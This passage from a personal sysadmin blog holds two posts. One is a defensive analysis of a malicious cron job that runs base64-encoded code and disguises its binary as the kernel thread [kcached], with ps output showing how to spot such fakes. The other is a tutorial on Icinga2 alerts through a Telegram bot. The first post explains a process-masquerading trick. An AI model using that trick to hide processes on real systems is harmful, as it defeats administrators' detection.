And while this explains what is logically happening. It still doesn't explain what this CronJob actually does.

Now another person explained that it is the gs-dbus service from Gnome being started, if it isn't already running and claimed it being probably safe. Why this person came to this conclusion is beyond me. Probably because https://gitlab.gnome.org/GNOME/gnome-software/-/blob/main/src/gs-dbus-helper.c shows up as a result if you just search for gs-dbus. But again this person oversaw a some critical pieces of information.

And this made me taking my time to write this little blogpost about how to approach such situations.

As there are some crucial pieces of evidence which immediately tell me that this is not a legitimate piece of software.

  1. Base64 encoded hashes which get executed via bash are almost never doing anything good
  2. If that software really belongs to Gnome you have Systemd unit-Files or Timers. Or if that is a system without Systemd: You got good old init. But then again there would, most likely, be some kind of Gnome sub-process started by Gnome itself and not some obfuscated CronJob
  3. Renaming the processname to [kcached] makes it look like a kernel level thread. If there is an equivalent to "World biggest warning sign" this is it.
  4. The binary being started is /home/admin/www/gs-dbus. You notice www as being the folder where the binary is stored? Yeah, this is always an indicator that files in that folder are reachable via a Webserver. Hence I assume that /home/admin/www/ hosts some vulnerable web application and this was the entry point for the malicious software & CronJob.

As what the person missed is: Processes in square brackets are always kernel level threads, running as root and have a Parent Process ID (PPID) of 2. This means someone is renaming a process started by a non-root user to look like a kernel level thread. Obviously to feint the users and security mechanisms of that system. There is no legitimate reason to do so.

Would you investigate further or even kill that process when some scanning software reports a kernel level thread? Well, the obvious answer is: Of course, YES! But far too many inexperienced users won't.

All processes with [] around them are started by kthreadd - the Kernel Thread Daemon. kthreadd itself is started by the kernel during boot.

Therefore we have 3 truths about kernel level threads:

  1. They will always have the process ID 2 as their parent process ID (PPID)
  2. They will always run as root, never as a user
  3. They will always be started by [kthreadd] itself

Lets take a look at the following ps output from one of my Debian systems. I make it quick & dirty and simply grep for all processes with a [ in it.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
      3       2 root     rcu_gp          [rcu_gp]
      4       2 root     rcu_par_gp      [rcu_par_gp]
      5       2 root     slub_flushwq    [slub_flushwq]
      6       2 root     netns           [netns]
      8       2 root     kworker/0:0H-ev [kworker/0:0H-events_highpri]
     10       2 root     mm_percpu_wq    [mm_percpu_wq]
     11       2 root     rcu_tasks_kthre [rcu_tasks_kthread]
     12       2 root     rcu_tasks_rude_ [rcu_tasks_rude_kthread]
     13       2 root     rcu_tasks_trace [rcu_tasks_trace_kthread]
     14       2 root     ksoftirqd/0     [ksoftirqd/0]
     15       2 root     rcu_preempt     [rcu_preempt]
     16       2 root     migration/0     [migration/0]
     18       2 root     cpuhp/0         [cpuhp/0]
     19       2 root     cpuhp/1         [cpuhp/1]
     20       2 root     migration/1     [migration/1]
     21       2 root     ksoftirqd/1     [ksoftirqd/1]
     23       2 root     kworker/1:0H-ev [kworker/1:0H-events_highpri]
     24       2 root     cpuhp/2         [cpuhp/2]
     25       2 root     migration/2     [migration/2]
     26       2 root     ksoftirqd/2     [ksoftirqd/2]
     28       2 root     kworker/2:0H-ev [kworker/2:0H-events_highpri]
     29       2 root     cpuhp/3         [cpuhp/3]
     30       2 root     migration/3     [migration/3]
     31       2 root     ksoftirqd/3     [ksoftirqd/3]
     33       2 root     kworker/3:0H-ev [kworker/3:0H-events_highpri]
     38       2 root     kdevtmpfs       [kdevtmpfs]
     39       2 root     inet_frag_wq    [inet_frag_wq]
     40       2 root     kauditd         [kauditd]
     41       2 root     khungtaskd      [khungtaskd]
     42       2 root     oom_reaper      [oom_reaper]
     43       2 root     writeback       [writeback]
     44       2 root     kcompactd0      [kcompactd0]
     45       2 root     ksmd            [ksmd]
     46       2 root     khugepaged      [khugepaged]
     47       2 root     kintegrityd     [kintegrityd]
     48       2 root     kblockd         [kblockd]
     49       2 root     blkcg_punt_bio  [blkcg_punt_bio]
     50       2 root     tpm_dev_wq      [tpm_dev_wq]
     51       2 root     edac-poller     [edac-poller]
     52       2 root     devfreq_wq      [devfreq_wq]
     54       2 root     kworker/0:1H-kb [kworker/0:1H-kblockd]
     55       2 root     kswapd0         [kswapd0]
     62       2 root     kthrotld        [kthrotld]
     64       2 root     acpi_thermal_pm [acpi_thermal_pm]
     66       2 root     mld             [mld]
     67       2 root     ipv6_addrconf   [ipv6_addrconf]
     72       2 root     kstrp           [kstrp]
     78       2 root     zswap-shrink    [zswap-shrink]
     79       2 root     kworker/u9:0    [kworker/u9:0]
    123       2 root     kworker/1:1H-kb [kworker/1:1H-kblockd]
    133       2 root     kworker/2:1H-kb [kworker/2:1H-kblockd]
    152       2 root     kworker/3:1H-kb [kworker/3:1H-kblockd]
    154       2 root     ata_sff         [ata_sff]
    155       2 root     scsi_eh_0       [scsi_eh_0]
    156       2 root     scsi_tmf_0      [scsi_tmf_0]
    157       2 root     scsi_eh_1       [scsi_eh_1]
    158       2 root     scsi_tmf_1      [scsi_tmf_1]
    159       2 root     scsi_eh_2       [scsi_eh_2]
    160       2 root     scsi_tmf_2      [scsi_tmf_2]
    173       2 root     kdmflush/254:0  [kdmflush/254:0]
    175       2 root     kdmflush/254:1  [kdmflush/254:1]
    209       2 root     jbd2/dm-0-8     [jbd2/dm-0-8]
    210       2 root     ext4-rsv-conver [ext4-rsv-conver]
    341       2 root     cryptd          [cryptd]
    426       2 root     ext4-rsv-conver [ext4-rsv-conver]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 340800       2 root     kworker/0:0-cgw [kworker/0:0-cgwb_release]
 341004       2 root     kworker/1:1-eve [kworker/1:1-events]
 341535       2 root     kworker/1:2     [kworker/1:2]
 341837       2 root     kworker/2:0-mm_ [kworker/2:0-mm_percpu_wq]
 342029       2 root     kworker/2:1     [kworker/2:1]
 342136  141234 root     sshd            sshd: user [priv]
 342266       2 root     kworker/0:1-eve [kworker/0:1-events]
 342273       2 root     kworker/u8:0-fl [kworker/u8:0-flush-254:0]
 342274       2 root     kworker/3:0-ata [kworker/3:0-ata_sff]
 342278       2 root     kworker/u8:3-ev [kworker/u8:3-events_unbound]
 342279       2 root     kworker/3:1-ata [kworker/3:1-ata_sff]
 342307       2 root     kworker/u8:1-ev [kworker/u8:1-events_unbound]
 342308       2 root     kworker/3:2-eve [kworker/3:2-events]
 342310  342144 user     grep            grep --color=auto \[

Notice something?

There are only 4 processes not having a PPID of 2.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 342136  141234 root     sshd            sshd: user [priv]
 342310  342144 user     grep            grep --color=auto \[

One is [kthreadd] who acutally owns PID 2 and got started by PPID 0, second is my grep command and two others are from the sshd but only the [kthreadd] is actually enclosed in square brackets as it doesn't contain any commandline.

If I start a random process and rename it to [gs-dbus], similar to what the CronJob would do, it will show up in the following way:

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
324234  453452 admin     [gs-dbus] [gs-dbus]

PID 324234, PPID 453452 and running under the username admin. Nothing that matches the behaviour of a kernel level thread. And this should raise all red flags your mind possesses.

And this is why basics are so important. Do not just assume a software is doing nothing bad as "There is some piece of legitimate software out there on the Internet sharing the same name.". Anyone can lie. And the bad people most likely are.

Comments

Icinga2 Monitoring notifications via Telegram Bot (Part 1)

Photo by Kindel Media: https://www.pexels.com/photo/low-angle-shot-of-robot-8566526/

One thing I wanted to set up for a long time was to get my Icinga2 notifications via some of the Instant Messaging apps I have on my mobile. So there was Threema, Telegram and Whatsapp to choose from.

Well.. Threema wants money for this kind of service, Whatsapp requires a business account who must be connected with the bot. And Whatsapp Business means I have to pay again? - Don't know - didn't pursue that path any further. As this either meant I would've needed to convert my private account into a business account or get a second account. No, sorry. Not something I want.

Telegram on the other hand? "Yeah, well, message the @botfather account, type /start, type /newbot, set a display and username, get your Bot-Token (for API usage) that's it. The only requirement we have? The username must end in bot." From here it was an easy decision which app I choose. (Telegram documentation here.)

Creating your telegram bot

  1. Search for the @botfather account on Telegram; doesn't matter if you use the mobile app or do it via Telegram Web.
  2. Type /start and a help message will be displayed.
  3. To create a new bot, type: /newbot
  4. Via the question "Alright, a new bot. How are we going to call it? Please choose a name for your bot." you are asked for the display name of your bot.
    • I choose something generic like "Icinga Monitoring Notifications".
  5. Likewise the question "Good. Now let's choose a username for your bot. It must end in `bot`. Like this, for example: TetrisBot or tetris_bot." asks for the username.
    • Choose whatever you like.
  6. If the username is already taken Telegram will state this and simply ask for a new username until you find one which is available.
  7. In the final message you will get your token to access the HTTP API. Note this down and save it in your password manager. We will need this later for Icinga.
  8. To test everything send a message to your bot in Telegram

That's the Telegram part. Pretty easy, right?

Testing our bot from the command line

We are now able to receive (via /getUpdates) and send messages (via /sendMessage) from/to our bot. Define the token as a shell variable and execute the following curl command to get the message that was sent to your bot. Note: Only new messages are received. If you already viewed them in Telegram Web the response will be empty. As seen in the first executed curl command.

Just close Telegram Web and the App on your phone and sent a message via curl. This should do the trick. Later we define our API-Token as a constant in the Icinga2 configuration.

For better readability I pipe the output through jq.

When there is a new message from your Telegram-Account to your bot, you will see a field with the named id. Note this number down. This is the Chat-ID from your account and we need this, so that your bot can actually send you messages.

Relevant documentation links are:

user@host:~$ TOKEN="YOUR-TOKEN"
user@host:~$ curl --silent "https://api.telegram.org/bot${TOKEN}/getUpdates" | jq
{
  "ok": true,
  "result": []
}
user@host:~$ curl --silent "https://api.telegram.org/bot${TOKEN}/getUpdates" | jq
{
  "ok": true,
  "result": [
    {
      "update_id": NUMBER,
      "message": {
        "message_id": 3,
        "from": {
          "id": CHAT-ID,
          "is_bot": false,
          "first_name": "John Doe Example",
          "username": "JohnDoeExample",
          "language_code": "de"
        },
        "chat": {
          "id": CHAT-ID,
          "first_name": "John Doe Example",
          "username": "JohnDoeExample",
          "type": "private"
        },
        "date": 1694637798,
        "text": "This is a test message"
      }
    }
  ]
}

Configuring Icinga2

Now we need to integrate our bot into the Icinga2 notification process. Luckily there were many people before us doing this, so there are already some notification scripts and example configuration files on GitHub.

I choose the scripts found here: https://github.com/lazyfrosch/icinga2-telegram

As I use the distributed monitoring I store some configuration files beneath /etc/icinga2/zones.d/. If you don't use this, feel free to store those files somewhere else. However as I define the Token in /etc/icinga2/constants.conf which isn't synced via the config file sync, I have to make sure that the Notification configuration is also stored outside of /etc/icinga2/zones.d/. Else the distributed setup will fail as the config file sync throws an syntax error on all other machines due to the missing TelegramBotToken constant.

First we define the API-Token in the /etc/icinga2/constants.conf file:

user@host:/etc/icinga2$ grep -B1 TelegramBotToken constants.conf
/* Telegram Bot Token */
const TelegramBotToken = "YOUR-TOKEN-HERE"

Afterwards we download the host and service notification script into /etc/icinga2/scripts and set the executeable bit.

user@host:/etc/icinga2/scripts$ wget https://raw.githubusercontent.com/lazyfrosch/icinga2-telegram/master/telegram-host-notification.sh
user@host:/etc/icinga2/scripts$ wget https://raw.githubusercontent.com/lazyfrosch/icinga2-telegram/master/telegram-service-notification.sh
user@host:/etc/icinga2/scripts$ chmod +x telegram-host-notification.sh telegram-service-notification.sh

Based on the notifications we want to receive, we need to define the variable vars.telegram_chat_id in the appropriate user/group object(s). An example for the icingaadmin is shown below and can be found in the icinga2-example.conf on GitHub: https://github.com/lazyfrosch/icinga2-telegram/blob/master/icinga2-example.conf along with the notification commands which we are setting up after this.

user@host:~$ cat /etc/icinga2/zones.d/global-templates/users.conf
object User "icingaadmin" {
  import "generic-user"

  display_name = "Icinga 2 Admin"
  groups = [ "icingaadmins" ]

  email = "root@localhost"
  vars.telegram_chat_id = "YOUR-CHAT-ID-HERE"
}

Notifications for Host & Service

We need to define 2 new NotificationCommand objects which trigger the telegram-(host|service)-notification.sh scripts. These are stored in /etc/icinga2/conf.d/telegrambot-commands.conf.

Note: We store the NotificationCommands and Notifications in /etc/icinga2/conf.d and NOT in /etc/icinga2/zones.d/master. This is because I have only one master in my setup which sends out notifications and as we defined the constant TelegramBotToken in /etc/icinga2/constants.conf - which is not synced via the zone config sync. Therefore we would run into an syntax error on all Icinga2 agents.

See https://admin.brennt.net/icinga2-error-check-command-does-not-exist-because-of-missing-constant for details.

Of course we could also define the constant in a file under /etc/icinga2/zones.d/master but I choose not to do so for security reasons.

user@host:/etc/icinga2$ cat /etc/icinga2/conf.d/telegrambot-commands.conf
/*
 * Notification Commands for Telegram Bot
 */
object NotificationCommand "telegram-host-notification" {
  import "plugin-notification-command"

  command = [ SysconfDir + "/icinga2/scripts/telegram-host-notification.sh" ]

  env = {
    NOTIFICATIONTYPE = "$notification.type$"
    HOSTNAME = "$host.name$"
    HOSTALIAS = "$host.display_name$"
    HOSTADDRESS = "$address$"
    HOSTSTATE = "$host.state$"
    LONGDATETIME = "$icinga.long_date_time$"
    HOSTOUTPUT = "$host.output$"
    NOTIFICATIONAUTHORNAME = "$notification.author$"
    NOTIFICATIONCOMMENT = "$notification.comment$"
    HOSTDISPLAYNAME = "$host.display_name$"
    TELEGRAM_BOT_TOKEN = TelegramBotToken
    TELEGRAM_CHAT_ID = "$user.vars.telegram_chat_id$"

    // optional
    ICINGAWEB2_URL = "https://host.domain.tld/icingaweb2"
  }
}

object NotificationCommand "telegram-service-notification" {
  import "plugin-notification-command"

  command = [ SysconfDir + "/icinga2/scripts/telegram-service-notification.sh" ]

  env = {
    NOTIFICATIONTYPE = "$notification.type$"
    SERVICEDESC = "$service.name$"
    HOSTNAME = "$host.name$"
    HOSTALIAS = "$host.display_name$"
    HOSTADDRESS = "$address$"
    SERVICESTATE = "$service.state$"
    LONGDATETIME = "$icinga.long_date_time$"
    SERVICEOUTPUT = "$service.output$"
    NOTIFICATIONAUTHORNAME = "$notification.author$"
    NOTIFICATIONCOMMENT = "$notification.comment$"
    HOSTDISPLAYNAME = "$host.display_name$"
    SERVICEDISPLAYNAME = "$service.display_name$"
    TELEGRAM_BOT_TOKEN = TelegramBotToken
    TELEGRAM_CHAT_ID = "$user.vars.telegram_chat_id$"

    // optional
    ICINGAWEB2_URL = "https://host.domain.tld/icingaweb2"
  }
}

As I want to get all notifications for all hosts and services I simply apply the notification object for all hosts and services which have a set host.name. - Same as in the example.

user@host:/etc/icinga2$ cat /etc/icinga2/conf.d/telegrambot-notifications.conf
/*
 * Notifications for alerting via Telegram Bot
 */
apply Notification "telegram-icingaadmin" to Host {
  import "mail-host-notification"
  command = "telegram-host-notification"

  users = [ "icingaadmin" ]

  assign where host.name
}

apply Notification "telegram-icingaadmin" to Service {
  import "mail-service-notification"
  command = "telegram-service-notification"

  users = [ "icingaadmin" ]

  assign where host.name
}

Checking configuration

Now we check if our Icinga2 config has no errors and reload the service:

root@host:~ # icinga2 daemon -C
[2023-09-14 22:19:37 +0200] information/cli: Icinga application loader (version: r2.12.3-1)
[2023-09-14 22:19:37 +0200] information/cli: Loading configuration file(s).
[2023-09-14 22:19:37 +0200] information/ConfigItem: Committing config item(s).
[2023-09-14 22:19:37 +0200] information/ApiListener: My API identity: hostname.domain.tld
[2023-09-14 22:19:37 +0200] information/ConfigItem: Instantiated 1 NotificationComponent.
[...]
[2023-09-14 22:19:37 +0200] information/ScriptGlobal: Dumping variables to file '/var/cache/icinga2/icinga2.vars'
[2023-09-14 22:19:37 +0200] information/cli: Finished validating the configuration file(s).
root@host:~ # systemctl reload icinga2.service

Verify it works

Log into your Icingaweb2 frontend, click the Notification link for a host or service and trigger a custom notification.

And we have a message in Telegram:

What about CheckMK?

If you use CheckMK see this blogpost: https://www.srcbox.net/posts/monitoring-notifications-via-telegram/

Lessons learned

And if you use this setup you will encounter one situation/question rather quickly: Do I really need to be woken up at 3am for every notification?

No. No you don't want to. Not in a professional context and even less in a private context.

Therefore: In part 2 we will register a second bot account and then use these to differentiate between important and unimportant notifications. The unimportant ones will be muted in the Telegram client on our smartphone. The important ones won't, and therefore are able to wake us at 3am in the morning.

Comments